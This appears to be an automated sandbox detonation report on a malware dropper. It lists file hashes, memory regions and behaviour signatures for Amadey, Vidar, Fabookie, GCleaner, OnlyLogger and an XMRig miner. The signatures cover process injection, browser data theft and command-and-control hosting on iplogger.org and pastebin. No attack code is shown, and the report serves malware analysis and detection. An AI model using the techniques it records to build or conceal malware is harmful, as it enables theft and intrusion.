\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\decoder.dll

MD5 62326d3ef35667b1533673d2bb1d342c
SHA1 8100ce90b7cbddd7ef2fd77c544ebf12ebd5ec33
SHA256 a087b791ff8ff9e05e339600199aa389a4554050acc7af7fa36dbe208be7382e
SHA512 7321feae8ee8d0653d7bd935e3d2e6f658e6798b2a7a8f44976c58509028e79284582132cb999c7c3124a7e94960d9c5d5fc8edefaeda06275ab725730d0d9b5

\Users\Admin\AppData\Local\Temp\is-N0CCE.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/2952-154-0x0000000000400000-0x0000000000878000-memory.dmp

memory/3012-141-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1724-160-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\15211163522206146976

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi

MD5 e8814a38767e2058ea73c141708d3944
SHA1 8a5cc50e86e64c724a458ef837a59881cf923534
SHA256 3b948d673f54a39a50d92b2819ab8d1ad2c54f9c1de368b19fca2c8648661e8d
SHA512 b0d7936840db0f8418a31f938144eb1826ebf6ac01ac358c5f6f607ba7267e6c1549ea46ea607dea825a5e83d2eae20304e29e25976cd66d21e87e7f7990f045

C:\Users\Admin\AppData\Local\Temp\CabCD01.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarCE2D.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\152111635222

MD5 fc64e693b8771f963768ae48e078092e
SHA1 3b77890df36beed5fcd3311817685ee085696ba7
SHA256 eeb7f0490c8d2f726eb3b4f0303a5573389b7a81d406c2926403c9910145534a
SHA512 76a12363cae00c5cbc9670ba8b9883125bb54fced6b5e3a2d5b01e2afb036363dc0fa5d749096fd31bd70c2aeedf3d155164534761dd800f9b45a87a6454bb62

memory/1928-270-0x00000000023D0000-0x000000000250A000-memory.dmp

memory/1928-321-0x0000000002890000-0x0000000002934000-memory.dmp

memory/1928-328-0x0000000000370000-0x0000000000402000-memory.dmp

memory/1928-325-0x0000000000370000-0x0000000000402000-memory.dmp

memory/2524-332-0x000007FEF5E73000-0x000007FEF5E74000-memory.dmp

memory/1640-331-0x0000000000400000-0x00000000008D7000-memory.dmp

memory/1640-335-0x00000000009F0000-0x0000000000AF0000-memory.dmp

memory/3056-334-0x0000000000400000-0x0000000000877000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSIEC7D.tmp

MD5 07ce413b1af6342187514871dc112c74
SHA1 8008f8bfeae99918b6323a3d1270dea63b3a8394
SHA256 0ba7e90fe2a0005e1e0dad53e2678916650c3b95ff9b666b802d128276c8ec46
SHA512 27df52bfcbc2d0ce3756a2526e632b5610d7047259b31aeeff12652de3e046bcd239e39c222a323654f475f1f913679b4fdd858303e0e105f7a300b6f6ed0fe5

memory/2248-349-0x0000000000400000-0x0000000000878000-memory.dmp

memory/1040-348-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1440-359-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1928-382-0x00000000023D0000-0x000000000250A000-memory.dmp

memory/3056-383-0x0000000000400000-0x0000000000877000-memory.dmp

memory/1640-391-0x00000000009F0000-0x0000000000AF0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{atcn-sTXCl-CVJ5-URQ2r}\83973314234.exe

MD5 6445250d234e789c0c2afe69f119e326
SHA1 03074f75c0ff50783d8c2e32d96e39b746540f66
SHA256 2e6cd9433e66a9ebde268bc6949d4660de441790bd39ffc9cb0f4caaeb44320f
SHA512 ecd094a4d026378f85435f8a2dc16c92c033aff92ba126d8bbb22d6b279b842d417f4df0f63199ea248d0ec64b9679acb5a1f835560d8e3c5b84be492cc0e68e

memory/1928-531-0x0000000000370000-0x0000000000402000-memory.dmp

memory/1928-532-0x0000000002940000-0x0000000003DC2000-memory.dmp

memory/1928-533-0x0000000003DD0000-0x0000000003E5B000-memory.dmp

memory/1928-537-0x0000000003E60000-0x0000000003EE6000-memory.dmp

memory/2124-556-0x0000000002390000-0x00000000024CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1044\background.jpg_1

MD5 dad3ad4310bc5bac9792e23d6949fcaa
SHA1 6dc7a1f5d6db6ef57dc854929110c9fd40ded9d3
SHA256 9aff9d1d1319aeaeb1ec627f42d2527dd6e54c14125d6c639ec9739b11795db8
SHA512 914deef5ffa1bac71109f81e57ab76b5a1f80d5b6c4b2717302c0d79e8ccc1b09e72a4c397521f7bfa15847aec7ce54038a316512e20637fb1e1c48b387f75d5

memory/2524-599-0x00000000005F0000-0x00000000005FE000-memory.dmp

memory/2124-605-0x00000000009E0000-0x0000000000A72000-memory.dmp

memory/2124-602-0x00000000009E0000-0x0000000000A72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSI4167.tmp

MD5 842cc23e74711a7b6955e6876c0641ce
SHA1 3c7f32c373e03d76e9f5d76d2dfdcb6508c7af56
SHA256 7e434d53739356b7f74c5143b98138c6b67b38c2dbd772a28e8dde70e8be8644
SHA512 dd8323f657786fae516b400fe6b0569b8d4d16ccb4b396648b427e875d9e5b1eb7a874338d386f0940dc370de6fecf9893efd28149745bc9fd3f67a792ec824d

memory/2312-615-0x000000013F3E0000-0x000000013F3F0000-memory.dmp

memory/2124-678-0x0000000002390000-0x00000000024CA000-memory.dmp

memory/2248-681-0x0000000000400000-0x0000000000878000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MSI6954.tmp

MD5 f32ac1d425e8b7c320d6be9a968585ab
SHA1 3b0bd3122226f2ac9f11664d9fc13d699b6dcfa0
SHA256 96f8d286f86055dcb3a15e0f3a2de092b0441ec36455c14caaad4c1f5a227894
SHA512 d8d9d996e279b7500306614448d61d5c3ac9c2efc28ac71d1daa09951f342d2cf773f0a7b51cb847f4d91dd34018e4a2d7977c0f6f2859795d4f0df7ac894b27

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 29d6d6774a763d9ff493fd87c7c1a777
SHA1 a1c90149a906aaf22698ef7e40bb52266d96662a
SHA256 139e0e7875eadc77137f4f7b52cd63779011d9b1ca285516e2dd3c784790a153
SHA512 eb4740dfaf806c28a3547b8b9cb050737ff4e01588281881592273f362948f183ca6242acbf8b3657e513297803e1afa318e3ae41267c91e8c190854fc06f79c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/2124-834-0x00000000009E0000-0x0000000000A72000-memory.dmp

memory/2124-861-0x0000000003E60000-0x0000000003EE6000-memory.dmp

memory/2092-922-0x0000000000400000-0x0000000000878000-memory.dmp

memory/2124-923-0x0000000000060000-0x0000000000061000-memory.dmp

memory/2124-925-0x0000000000070000-0x0000000000075000-memory.dmp

memory/2124-924-0x0000000000060000-0x0000000000063000-memory.dmp

memory/2684-938-0x000000013F630000-0x000000013F636000-memory.dmp

C:\Config.Msi\f77c277.rbs

MD5 9399e483f330ba22edbf122f3b7f56e9
SHA1 52033f227a6f607e1b046a74908c545366e1d96a
SHA256 084a33c79436104d5b509d9ad1ae15cbf992f5a8a8c7231565e961beccafa688
SHA512 6bdc8bd13e743c740e7ebc51ccf590b94c8f5f4f8a1ef2f2f6d4e5104c02dc4a967eb171e8fe6c89663732495d6c9a2167d43a395ec16f8be575f3217869396c

C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_1044\background.jpg

MD5 31e2eb815eb3a794b04a2a300f24c3b0
SHA1 ac129cfafe62d2dd77a95ce9cacd5b8e5bf4b4fa
SHA256 7686c3e3e78ba82914789e8e69781299d054a910710f004c774a20b5b123e2c1
SHA512 ffe4ddc06d278d61c7d8d827eb33184310f43fb86b1850a45e5b06ed6562564df33073158b336efd7f9ed417d0a7123d17c3b7f7fc914d06f628d7588f4380fb

C:\Users\Admin\AppData\Local\Temp\f7873aa.exe

MD5 99c8a5f7c87b4ec0ac66592a85e129f5
SHA1 3699ef050962cfa6e3d6440a941396c9f022ea52
SHA256 899c95d880933fc5a12f409c8e7821148ef0f9b4a28c226cb9cc6f44caacdbad
SHA512 a3af8e0340d85cc0d83ed0824c98ff1de2aba7d73299ce47ab136df40c44ed34acd5e06d80d22a61b2963bd6c5586d80d446b205aa1e9ddad27b3ba4396b1b18

memory/1548-1166-0x0000000001020000-0x0000000001028000-memory.dmp

memory/1204-1197-0x0000000000A00000-0x0000000000A08000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-12-05 09:40

Reported

2024-12-05 09:42

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Vidar

stealer vidar

Vidar family

vidar

Xmrig family

xmrig

xmrig

miner xmrig

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services64.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sfx_123_206.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jhuuee.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\lijun-game.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\4MCYlgNAW.eXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\services64.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-7938F.tmp\setup_2.tmp N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A

Reads user/profile data of web browsers

spyware stealer

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Cleaner Installation.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3608 set thread context of 816 N/A C:\Users\Admin\AppData\Local\Temp\inst001.exe C:\Users\Admin\AppData\Local\Temp\mZkzkgccxHSnguzkDO\QTborv
PID 3240 set thread context of 3676 N/A C:\Users\Admin\AppData\Roaming\services64.exe C:\Windows\explorer.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSI6D3C.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7240.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI737B.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e586b19.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7438.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e586b19.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI732B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI73AA.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI7192.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI71D2.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\Firstoffer.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\e8a12a95fa\sqtvvs.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\e59a3a9.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\e59da68.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\inst001.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-RVTDF.tmp\setup_2.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\syswow64\MsiExec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\c71460537b9584b5f550df694b80c9aa_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
